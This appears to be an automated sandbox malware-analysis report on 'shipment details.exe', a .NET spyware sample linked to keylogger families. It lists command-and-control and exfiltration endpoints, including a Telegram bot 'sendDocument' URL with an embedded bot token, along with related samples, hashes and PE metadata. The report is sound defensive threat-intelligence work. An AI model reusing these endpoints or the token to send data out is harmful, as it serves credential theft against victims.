                                            http://aborters.duckdns.org:8081shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                              unknown
                                              https://ac.ecosia.org/autocomplete?q=shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://51.38.247.67:8081/_send_.php?Lshipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://reallyfreegeoip.org/xml/8.46.123.33$shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E1A000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://anotherarmy.dns.army:8081shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchshipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://checkip.dyndns.org/qshipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enlBshipment details.exe, 00000001.00000002.4520239872.0000000002F5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://reallyfreegeoip.orgshipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://api.telegram.org/bot7556271394:AAEi7387e6n5TKFT7iFrsH4cBWT2k35v3D8/sendDocument?chat_id=2135shipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://api.telegram.orgshipment details.exe, 00000001.00000002.4520239872.0000000002F1D000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002F44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameshipment details.exe, 00000001.00000002.4520239872.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=shipment details.exe, 00000001.00000002.4523597772.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedshipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://reallyfreegeoip.org/xml/shipment details.exe, 00000000.00000002.4520588086.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4520239872.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, shipment details.exe, 00000001.00000002.4518256105.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          149.154.167.220
                                                          api.telegram.orgUnited Kingdom
                                                          62041TELEGRAMRUtrue
                                                          188.114.97.3
                                                          reallyfreegeoip.orgEuropean Union
                                                          13335CLOUDFLARENETUStrue
                                                          158.101.44.242
                                                          checkip.dyndns.comUnited States
                                                          31898ORACLE-BMC-31898USfalse
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1529185
                                                          Start date and time:2024-10-08 18:20:09 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 56s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:6
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:shipment details.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@3/0@4/3
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 81
                                                          • Number of non-executed functions: 16
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • VT rate limit hit for: shipment details.exe
                                                          TimeTypeDescription
                                                          12:21:06API Interceptor11766902x Sleep call for process: shipment details.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          149.154.167.220Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                  JBybSK0HzG.exeGet hashmaliciousAgentTeslaBrowse
                                                                    05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            83pkjaRlqu.exeGet hashmaliciousAgentTeslaBrowse
                                                                              188.114.97.3scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                                              • paste.ee/d/gvOd3
                                                                              IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                              • www.bayarcepat19.click/yuvr/
                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                              • www.cc101.pro/0r21/
                                                                              http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                                              • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/eZFzMENr/download
                                                                              QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • filetransfer.io/data-package/MlZtCPkK/download
                                                                              https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                              • mairie-espondeilhan.com/
                                                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • filetransfer.io/data-package/758bYd86/download
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                              • filetransfer.io/data-package/58PSl7si/download
                                                                              158.101.44.242EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              eGBOY15aNx.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              103_25IBOT242790502_725597355.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              PO-009 Compurent.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              Justificante de pago.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • checkip.dyndns.org/
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              reallyfreegeoip.orgY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              FACTURAS 2024-665.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              CXWCXZOzGM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              checkip.dyndns.comY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              FACTURAS 2024-665.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              CXWCXZOzGM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              api.telegram.orgY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              JBybSK0HzG.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              83pkjaRlqu.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRUY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              15PylGQjzK.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 149.154.167.99
                                                                              Ji7kZhlqxz.exeGet hashmaliciousLummaC, VidarBrowse
                                                                              • 149.154.167.99
                                                                              JBybSK0HzG.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              CLOUDFLARENETUShttp://email-tracking.jotelulu.com/c/eJx0yjFyhSAQANDTQBeHXVaFgiKN90B29ZMQdRCSGU-fyQFSv8dhHdmSlgAzOjIEnvQrgLeSVgTrMPlRmBmtoMA2-W1NE-gc0CCBMQ4mmCwNntfkeJxnEYpuc4rMx9mk9NKHdH7pEl6tXbey7woXhUvNdyySj17b8xcULj_XWz5S6Sy3wqXVmD7zsSu0u9R8D5dUeRSZ_YxxOOuua_gHvgP-BgAA__-1WEObGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://hnt.zkg.mybluehost.me/CA/LETGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              https://salesf54b.myportfolio.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.21.30.116
                                                                              https://1drv.ms/w/c/3e7c84f1a590a3e6/IQStDJr3bMEwQZDK5oU6uNI1AXa25ZxVanY0bWjgRrRk-d4Get hashmaliciousUnknownBrowse
                                                                              • 104.18.36.155
                                                                              paymentremittanceinformationCQDM.htmlGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                              • 188.114.96.3
                                                                              https://ipfs.io/ipfs/QmNRP5R9QkxB8MVgk2kWzrmB6GoTVL3gcLheGnJuUDPaXv?filename=forme.html#jstubblefield@securustechnologies.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.17.25.14
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              ORACLE-BMC-31898USY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              FACTURAS 2024-665.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 193.122.130.0
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 193.122.6.168
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 158.101.44.242
                                                                              https://www.google.com.bo/url?url=https://coqjcqixwpeuzndc&hpj=jguragr&fwbtzg=qoe&ffzzf=olnshn&aes=fvotjnl&garqe=txbrxc&emrj=ycbtmrgd&uwzlcgsurn=eygnbnharg&q=amp/jhjn24u.v%C2%ADvg%C2%ADzy%C2%ADnp%C2%ADe%C2%ADw%C2%ADl%C2%ADkkukl.com%E2%80%8B/4b3puorbt&vijx=zlglfoj&qcobrch=pupf&cjaim=omgedz&guneqiu=xqm&d=DwMFAgGet hashmaliciousUnknownBrowse
                                                                              • 192.29.14.118
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              54328bd36c14bd82ddaa0c04b25ed9adY1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              FACTURAS 2024-665.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              bYXVK2sdmF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              AeOv2Ar7h5.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              CXWCXZOzGM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.97.3
                                                                              3b5074b1b5d032e5620f69f9f700ff0eXDA_CDS v6.8.54_SE.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              Y1ZqkGzvKm.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              E_receipt.vbsGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              EY10AIvC8B.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              92ZZIUHzPQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              JBybSK0HzG.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              05NN8zSK04.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              OYIZolitxJ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              No context
                                                                              No created / dropped files found
                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.795880347578578
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:shipment details.exe
                                                                              File size:488'448 bytes
                                                                              MD5:606686ad6a08ebe2cc694b5618cfaab5
                                                                              SHA1:06f5f2c91d2a4c7e02547ed997a4db3b92352971
                                                                              SHA256:f13526451639d7df1a8100047250b017cbfc065ce1271b6ffa30bc49de024d54
                                                                              SHA512:1cbbac0853eb1fe7913f8361cada0e2077c4c5e3be4375497af45f8216b49e9864eebfbbe917c2fd39e600c5f986bfd8cf15531bb63409fd6064a00ed7e5f923
                                                                              SSDEEP:12288:M/hv8C232ty/B1uj3K/Kq2oJqW5ZG+Ntt3GTl5klx:uI32tynuja/Kq2oJMQWlW
                                                                              TLSH:B9A4F18C7E985071CBF17FBDED7745D994B0094D0AA7AEB88A4733394A2007EB867706
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0..j............... ........@.. ....................................`................................
                                                                              Icon Hash:00928e8e8686b000
                                                                              Entrypoint:0x4788be
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x93CCF654 [Thu Jul 30 00:52:36 2048 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x788700x4b.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x586.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x20000x768c40x76a009180c51e5d7aaccd299ab99f7a5e5eeeFalse0.667353381849315data7.802547137134015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x7a0000x5860x6008ada3ce139cccc31ef726e74f50ce202False0.4134114583333333data4.033521752293894IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x7c0000xc0x2004dac309b04c7d448de873e9a75cbfcb5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
